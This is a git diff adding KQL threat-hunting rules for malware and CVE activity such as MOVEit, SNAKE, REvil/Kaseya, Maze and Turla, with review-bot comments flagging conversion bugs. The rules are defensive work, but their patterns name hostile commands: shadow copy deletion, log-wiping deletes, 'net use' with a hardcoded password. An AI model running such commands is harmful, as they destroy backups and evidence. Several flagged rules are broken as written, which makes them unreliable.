+// False Positives:
+// - Administrative activity directly with root authentication might trigger this rule if it's unnecessarily prefixed with "sh -c" or "bash -c"
+
+DeviceProcessEvents
+| where (ProcessCommandLine startswith "bash -c" or ProcessCommandLine startswith "sh -c") and InitiatingProcessFolderPath endswith "/sshd" and AccountName =~ "root"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql b/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql
new file mode 100644
index 00000000..5f0c094c
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql
@@ -0,0 +1,13 @@
+// Title: Potential Exploitation of CVE-2024-37085 - Suspicious Creation Of ESX Admins Group
+// Author: frack113
+// Date: 2024-07-29
+// Level: high
+// Description: Detects execution of the "net.exe" command in order to add a group named "ESX Admins".
+This could indicates a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on an domain-joined ESXi hypervisor.
+VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2024-37085, detection.emerging-threats
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "/add" and ProcessCommandLine contains "/domain" and ProcessCommandLine contains "ESX Admins" and ProcessCommandLine contains "group") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) or ((ProcessCommandLine contains "New-ADGroup" and ProcessCommandLine contains "ESX Admins") and ((FolderPath endswith "\\PowerShell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.exe", "pwsh.dll"))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_goofy_guineapig_backdoor_activity.kql b/KQL/rules-emerging-threats/Execution/potential_goofy_guineapig_backdoor_activity.kql
new file mode 100644
index 00000000..38ce5982
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_goofy_guineapig_backdoor_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential Goofy Guineapig Backdoor Activity
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-05-14
+// Level: high
+// Description: Detects a specific broken command that was used by Goofy-Guineapig as described by the NCSC report.
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "choice /t %d /d y /n >nul"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql b/KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql
new file mode 100644
index 00000000..097b0835
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql
@@ -0,0 +1,12 @@
+// Title: Potential KamiKakaBot Activity - Lure Document Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2024-03-22
+// Level: medium
+// Description: Detects the execution of a Word document via the WinWord Start Menu shortcut.
+This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/c " and ProcessCommandLine contains ".lnk ~" and ProcessCommandLine contains "Start Menu\\Programs\\Word") and ProcessCommandLine endswith ".doc" and FolderPath endswith "\\cmd.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_maze_ransomware_activity.kql b/KQL/rules-emerging-threats/Execution/potential_maze_ransomware_activity.kql
new file mode 100644
index 00000000..34337005
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_maze_ransomware_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential Maze Ransomware Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-05-08
+// Level: critical
+// Description: Detects specific process characteristics of Maze ransomware word document droppers
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002, attack.t1047, attack.impact, attack.t1490, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith ".tmp" and InitiatingProcessFolderPath endswith "\\WINWORD.exe") or (ProcessCommandLine endswith "shadowcopy delete" and FolderPath endswith "\\wmic.exe" and InitiatingProcessFolderPath contains "\\Temp\\") or (ProcessCommandLine contains "\\..\\..\\system32" and ProcessCommandLine endswith "shadowcopy delete")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql b/KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql
new file mode 100644
index 00000000..0ce123a9
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql
@@ -0,0 +1,19 @@
+// Title: Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE
+// Author: @kostastsale
+// Date: 2023-06-01
+// Level: medium
+// Description: Detects the execution of "csc.exe" via "w3wp.exe" process. MOVEit affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files.
+
+MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll.
+
+Hunting Opportunity
+
+Events from IIS dynamically compiling binaries via the csc.exe on behalf of the MOVEit application, especially since May 27th should be investigated.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, cve.2023-34362, detection.emerging-threats
+// False Positives:
+// - Initial software installation and software updates.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\csc.exe" and InitiatingProcessCommandLine contains "moveitdmz pool" and InitiatingProcessFolderPath endswith "\\w3wp.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_qbot_activity.kql b/KQL/rules-emerging-threats/Execution/potential_qbot_activity.kql
new file mode 100644
index 00000000..fa85f495
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_qbot_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential QBot Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-10-01
+// Level: critical
+// Description: Detects potential QBot activity by looking for process executions used previously by QBot
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\wscript.exe" and InitiatingProcessFolderPath endswith "\\WinRAR.exe") or ProcessCommandLine contains " /c ping.exe -n 6 127.0.0.1 & type " or (ProcessCommandLine contains "regsvr32.exe" and ProcessCommandLine contains "C:\\ProgramData" and ProcessCommandLine contains ".tmp")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_raspberry_robin_dot_ending_file.kql b/KQL/rules-emerging-threats/Execution/potential_raspberry_robin_dot_ending_file.kql
new file mode 100644
index 00000000..41679e16
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_raspberry_robin_dot_ending_file.kql
@@ -0,0 +1,10 @@
+// Title: Potential Raspberry Robin Dot Ending File
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-28
+// Level: high
+// Description: Detects commandline containing reference to files ending with a "." This scheme has been seen used by raspberry-robin
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ "']{1}"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql b/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql
new file mode 100644
index 00000000..0e155f3c
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql
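Review bot: In the second hunk on this line (potential_raspberry_robin_dot_ending_file.kql) the regex literal contains an unescaped double quote inside the character class, `[ "']`, which terminates the Kusto string early and leaves `']{1}"` dangling, so the query will not parse. The quote has to be escaped in a double-quoted Kusto string: `| where ProcessCommandLine matches regex "\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}"`. This points at a missing quote-escaping step in the backend's string emitter, so other rules whose Sigma patterns contain a `"` are likely affected too; and since `matches regex` runs over every process event with no cheaper pre-filter, it is worth checking the cost of this rule once it parses.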
@@ -0,0 +1,14 @@
+// Title: Potential SAP NetWeaver Webshell Creation
+// Author: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-04-28
+// Level: medium
+// Description: Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories,
+which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.initial-access, attack.t1190, attack.persistence, attack.t1059.003, cve.2025-31324, detection.emerging-threats
+// False Positives:
+// - Legitimate creation of jsc or java files in these locations
+
+DeviceFileEvents
+| where (FolderPath endswith ".jsp" or FolderPath endswith ".java" or FolderPath endswith ".class") and (FolderPath contains "\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\work" or FolderPath contains "\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\root")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql b/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql
new file mode 100644
index 00000000..41d16930
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql
@@ -0,0 +1,14 @@
+// Title: Potential SAP NetWeaver Webshell Creation - Linux
+// Author: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-04-28
+// Level: medium
+// Description: Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories,
+which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.initial-access, attack.t1190, attack.persistence, attack.t1059.003, cve.2025-31324, detection.emerging-threats
+// False Positives:
+// - Legitimate creation of jsc or java files in these locations
+
+DeviceFileEvents
+| where (FolderPath endswith ".jsp" or FolderPath endswith ".java" or FolderPath endswith ".class") and (FolderPath contains "/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work/" or FolderPath contains "/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_binary_indicator.kql b/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_binary_indicator.kql
new file mode 100644
index 00000000..8d6a2a38
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_binary_indicator.kql
@@ -0,0 +1,12 @@
+// Title: Potential SNAKE Malware Installation Binary Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-04
+// Level: high
+// Description: Detects a specific binary name seen used by SNAKE malware during its installation as described by CISA in their report
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\jpsetup.exe" or FolderPath endswith "\\jpinst.exe") and (not((ProcessCommandLine =~ "" or (ProcessCommandLine in~ ("jpinst.exe", "jpinst", "jpsetup.exe", "jpsetup")) or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_cli_arguments_indicator.kql b/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_cli_arguments_indicator.kql
new file mode 100644
index 00000000..de289055
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_cli_arguments_indicator.kql
@@ -0,0 +1,12 @@
+// Title: Potential SNAKE Malware Installation CLI Arguments Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-04
+// Level: high
+// Description: Detects a specific command line arguments sequence seen used by SNAKE malware during its installation as described by CISA in their report
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "\\s[a-fA-F0-9]{64}\\s[a-fA-F0-9]{16}"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_snake_malware_persistence_service_execution.kql b/KQL/rules-emerging-threats/Execution/potential_snake_malware_persistence_service_execution.kql
new file mode 100644
index 00000000..beb21616
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_snake_malware_persistence_service_execution.kql
@@ -0,0 +1,10 @@
+// Title: Potential SNAKE Malware Persistence Service Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-04
+// Level: high
+// Description: Detects a specific child/parent process relationship indicative of a "WerFault" process running from the "WinSxS" as a service. This could be indicative of potential SNAKE malware activity as reported by CISA.
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+
+DeviceProcessEvents
+| where FolderPath endswith "\\WerFault.exe" and FolderPath startswith "C:\\Windows\\WinSxS\\" and InitiatingProcessFolderPath endswith "\\services.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_snatch_ransomware_activity.kql b/KQL/rules-emerging-threats/Execution/potential_snatch_ransomware_activity.kql
new file mode 100644
index 00000000..f7c78887
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_snatch_ransomware_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential Snatch Ransomware Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-08-26
+// Level: high
+// Description: Detects specific process characteristics of Snatch ransomware word document droppers
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204, detection.emerging-threats
+// False Positives:
+// - Scripts that shutdown the system immediately and reboot them in safe mode are unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "shutdown\\s+/r /f /t 00" or ProcessCommandLine matches regex "net\\s+stop SuperBackupMan"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/printernightmare_mimikatz_driver_name.kql b/KQL/rules-emerging-threats/Execution/printernightmare_mimikatz_driver_name.kql
new file mode 100644
index 00000000..b4dc7b88
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/printernightmare_mimikatz_driver_name.kql
@@ -0,0 +1,12 @@
+// Title: PrinterNightmare Mimikatz Driver Name
+// Author: Markus Neis, @markus_neis, Florian Roth
+// Date: 2021-07-04
+// Level: critical
+// Description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204, cve.2021-1675, cve.2021-34527, detection.emerging-threats
+// False Positives:
+// - Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\QMS 810*" or RegistryKey contains "\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\mimikatz") or (RegistryKey contains "legitprinter" and RegistryKey contains "\\Control\\Print\\Environments\\Windows") or ((RegistryKey contains "\\Control\\Print\\Environments" or RegistryKey contains "\\CurrentVersion\\Print\\Printers") and (RegistryKey contains "Gentil Kiwi" or RegistryKey contains "mimikatz printer" or RegistryKey contains "Kiwi Legit Printer"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/qakbot_uninstaller_execution.kql b/KQL/rules-emerging-threats/Execution/qakbot_uninstaller_execution.kql
new file mode 100644
index 00000000..db5ce9c1
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/qakbot_uninstaller_execution.kql
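Review bot: `RegistryKey endswith "...\\Version-3\\QMS 810*"` keeps the Sigma wildcard as a literal asterisk; KQL `endswith` has no glob semantics, so this branch only fires on a key that literally ends in `*` and the QMS 810 driver name is effectively never detected. It should be written like the `mimikatz` branch beside it: `RegistryKey contains "\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\QMS 810"`. The same untranslated wildcard appears in the Ursnif rule further down (`contains "\\AppData\\local\\temp*.bin"`), where `ProcessCommandLine contains "\\AppData\\local\\temp" and ProcessCommandLine contains ".bin"` (or a `matches regex`) is needed; a conversion-time check that rejects `*` inside `contains`/`startswith`/`endswith` arguments would have caught both.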
@@ -0,0 +1,12 @@
+// Title: Qakbot Uninstaller Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2023-08-31
+// Level: high
+// Description: Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\QbotUninstall.exe" or (SHA256 startswith "423A9D13D410E2DC38EABB9FDF3121D2072472D0426260283A638B822DCD5180" or SHA256 startswith "559CAE635F0D870652B9482EF436B31D4BB1A5A0F51750836F328D749291D0B6" or SHA256 startswith "855EB5481F77DDE5AD8FA6E9D953D4AEBC280DDDF9461144B16ED62817CC5071" or SHA256 startswith "FAB408536AA37C4ABC8BE97AB9C1F86CB33B63923D423FDC2859EB9D63FA8EA0")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/raspberry_robin_initial_execution_from_external_drive.kql b/KQL/rules-emerging-threats/Execution/raspberry_robin_initial_execution_from_external_drive.kql
new file mode 100644
index 00000000..5d31244e
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/raspberry_robin_initial_execution_from_external_drive.kql
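Review bot: The four hash branches use `SHA256 startswith` with full 64-character digests, which reads as a prefix match although it can only ever be an exact match; `SHA256 in~ ("423A9D13D410E2DC38EABB9FDF3121D2072472D0426260283A638B822DCD5180", "559CAE635F0D870652B9482EF436B31D4BB1A5A0F51750836F328D749291D0B6", "855EB5481F77DDE5AD8FA6E9D953D4AEBC280DDDF9461144B16ED62817CC5071", "FAB408536AA37C4ABC8BE97AB9C1F86CB33B63923D423FDC2859EB9D63FA8EA0")` states the intent and keeps the indicator list in one place. This is a style point only: both operators are case-insensitive, so the uppercase literals are not a functional concern.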
@@ -0,0 +1,12 @@
+// Title: Raspberry Robin Initial Execution From External Drive
+// Author: @kostastsale
+// Date: 2022-05-06
+// Level: high
+// Description: Detects the initial execution of the Raspberry Robin malware from an external drive using "Cmd.EXE".
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http:" or ProcessCommandLine contains "https:") and ((ProcessCommandLine contains "-q" or ProcessCommandLine contains "/q" or ProcessCommandLine contains "–q" or ProcessCommandLine contains "—q" or ProcessCommandLine contains "―q") and FolderPath endswith "\\msiexec.exe") and (InitiatingProcessCommandLine contains "/r" and (InitiatingProcessCommandLine endswith ".bin" or InitiatingProcessCommandLine endswith ".ico" or InitiatingProcessCommandLine endswith ".lnk" or InitiatingProcessCommandLine endswith ".lo" or InitiatingProcessCommandLine endswith ".sv" or InitiatingProcessCommandLine endswith ".usb") and InitiatingProcessFolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/raspberry_robin_subsequent_execution_of_commands.kql b/KQL/rules-emerging-threats/Execution/raspberry_robin_subsequent_execution_of_commands.kql
new file mode 100644
index 00000000..0e2abbb2
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/raspberry_robin_subsequent_execution_of_commands.kql
@@ -0,0 +1,12 @@
+// Title: Raspberry Robin Subsequent Execution of Commands
+// Author: @kostastsale
+// Date: 2022-05-06
+// Level: high
+// Description: Detects raspberry robin subsequent execution of commands.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "installdriver" or ProcessCommandLine contains "setfiledsndir" or ProcessCommandLine contains "vkipdse") and (ProcessCommandLine contains "odbcconf.exe" and ProcessCommandLine contains "regsvr" and ProcessCommandLine contains "shellexec_rundll") and (ProcessCommandLine endswith "-a" or ProcessCommandLine endswith "/a" or ProcessCommandLine endswith "–a" or ProcessCommandLine endswith "—a" or ProcessCommandLine endswith "―a" or ProcessCommandLine endswith "-f" or ProcessCommandLine endswith "/f" or ProcessCommandLine endswith "–f" or ProcessCommandLine endswith "—f" or ProcessCommandLine endswith "―f" or ProcessCommandLine endswith "-s" or ProcessCommandLine endswith "/s" or ProcessCommandLine endswith "–s" or ProcessCommandLine endswith "—s" or ProcessCommandLine endswith "―s") and (FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\regsvr32.exe") and InitiatingProcessFolderPath endswith "\\fodhelper.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/revil_kaseya_incident_malware_patterns.kql b/KQL/rules-emerging-threats/Execution/revil_kaseya_incident_malware_patterns.kql
new file mode 100644
index 00000000..5dd3d844
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/revil_kaseya_incident_malware_patterns.kql
@@ -0,0 +1,10 @@
+// Title: REvil Kaseya Incident Malware Patterns
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-03
+// Level: critical
+// Description: Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.g0115, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "C:\\Windows\\cert.exe" or ProcessCommandLine contains "del /q /f c:\\kworking\\agent.crt" or ProcessCommandLine contains "Kaseya VSA Agent Hot-fix" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\MsMpEng.exe" or ProcessCommandLine contains "rmdir /s /q %SystemDrive%\\inetpub\\logs" or (ProcessCommandLine contains "del /s /q /f %SystemDrive%\\" and ProcessCommandLine contains ".log") or ProcessCommandLine contains "c:\\kworking1\\agent.exe" or ProcessCommandLine contains "c:\\kworking1\\agent.crt") or (FolderPath in~ ("C:\\Windows\\MsMpEng.exe", "C:\\Windows\\cert.exe", "C:\\kworking\\agent.exe", "C:\\kworking1\\agent.exe")) or (ProcessCommandLine contains "del /s /q /f" and ProcessCommandLine contains "WebPages\\Errors\\webErrorLog.txt")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/rorschach_ransomware_execution_activity.kql b/KQL/rules-emerging-threats/Execution/rorschach_ransomware_execution_activity.kql
new file mode 100644
index 00000000..d81d716c
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/rorschach_ransomware_execution_activity.kql
@@ -0,0 +1,12 @@
+// Title: Rorschach Ransomware Execution Activity
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-04-04
+// Level: critical
+// Description: Detects Rorschach ransomware execution activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003, attack.t1059.001, attack.defense-evasion, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "11111111" and (FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\vssadmin.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/snake_malware_installer_name_indicators.kql b/KQL/rules-emerging-threats/Execution/snake_malware_installer_name_indicators.kql
new file mode 100644
index 00000000..88ef0160
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/snake_malware_installer_name_indicators.kql
@@ -0,0 +1,12 @@
+// Title: SNAKE Malware Installer Name Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-10
+// Level: low
+// Description: Detects filename indicators associated with the SNAKE malware as reported by CISA in their report
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Some legitimate software was also seen using these names. Apply additional filters and use this rule as a hunting basis.
+
+DeviceFileEvents
+| where FolderPath endswith "\\jpsetup.exe" or FolderPath endswith "\\jpinst.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/snake_malware_kernel_driver_file_indicator.kql b/KQL/rules-emerging-threats/Execution/snake_malware_kernel_driver_file_indicator.kql
new file mode 100644
index 00000000..69a9adc5
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/snake_malware_kernel_driver_file_indicator.kql
@@ -0,0 +1,12 @@
+// Title: SNAKE Malware Kernel Driver File Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-10
+// Level: critical
+// Description: Detects SNAKE malware kernel driver file indicator
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath =~ "C:\\Windows\\System32\\Com\\Comadmin.dat"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/snake_malware_werfault_persistence_file_creation.kql b/KQL/rules-emerging-threats/Execution/snake_malware_werfault_persistence_file_creation.kql
new file mode 100644
index 00000000..fdd0e8b5
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/snake_malware_werfault_persistence_file_creation.kql
@@ -0,0 +1,10 @@
+// Title: SNAKE Malware WerFault Persistence File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-10
+// Level: high
+// Description: Detects the creation of a file named "WerFault.exe" in the WinSxS directory by a non-system process, which can be indicative of potential SNAKE malware activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+
+DeviceFileEvents
+| where (FolderPath endswith "\\WerFault.exe" and FolderPath startswith "C:\\Windows\\WinSxS\\") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/trickbot_malware_activity.kql b/KQL/rules-emerging-threats/Execution/trickbot_malware_activity.kql
new file mode 100644
index 00000000..405d7123
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/trickbot_malware_activity.kql
@@ -0,0 +1,10 @@
+// Title: Trickbot Malware Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-11-26
+// Level: high
+// Description: Detects Trickbot malware process tree pattern in which "rundll32.exe" is a parent of "wermgr.exe"
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1559, detection.emerging-threats
+
+DeviceProcessEvents
+| where FolderPath endswith "\\wermgr.exe" and InitiatingProcessCommandLine contains "DllRegisterServer" and InitiatingProcessFolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/tropictrooper_campaign_november_2018.kql b/KQL/rules-emerging-threats/Execution/tropictrooper_campaign_november_2018.kql
new file mode 100644
index 00000000..e618219e
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/tropictrooper_campaign_november_2018.kql
@@ -0,0 +1,10 @@
+// Title: TropicTrooper Campaign November 2018
+// Author: @41thexplorer, Microsoft Defender ATP
+// Date: 2019-11-12
+// Level: high
+// Description: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/turla_group_lateral_movement.kql b/KQL/rules-emerging-threats/Execution/turla_group_lateral_movement.kql
new file mode 100644
index 00000000..068b39ef
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/turla_group_lateral_movement.kql
@@ -0,0 +1,10 @@
+// Title: Turla Group Lateral Movement
+// Author: Markus Neis
+// Date: 2017-11-07
+// Level: critical
+// Description: Detects automated lateral movement by Turla group
+// MITRE Tactic: Execution
+// Tags: attack.g0010, attack.execution, attack.t1059, attack.lateral-movement, attack.t1021.002, attack.discovery, attack.t1083, attack.t1135, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine startswith "net use \\\\%DomainController%\\C$ \"P@ssw0rd\" " or (ProcessCommandLine contains "dir c:\\" and ProcessCommandLine contains ".doc" and ProcessCommandLine contains " /s") or (ProcessCommandLine contains "dir %TEMP%\\" and ProcessCommandLine contains ".exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/unc2452_powershell_pattern.kql b/KQL/rules-emerging-threats/Execution/unc2452_powershell_pattern.kql
new file mode 100644
index 00000000..f52fc752
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/unc2452_powershell_pattern.kql
@@ -0,0 +1,12 @@
+// Title: UNC2452 PowerShell Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-01-20
+// Level: critical
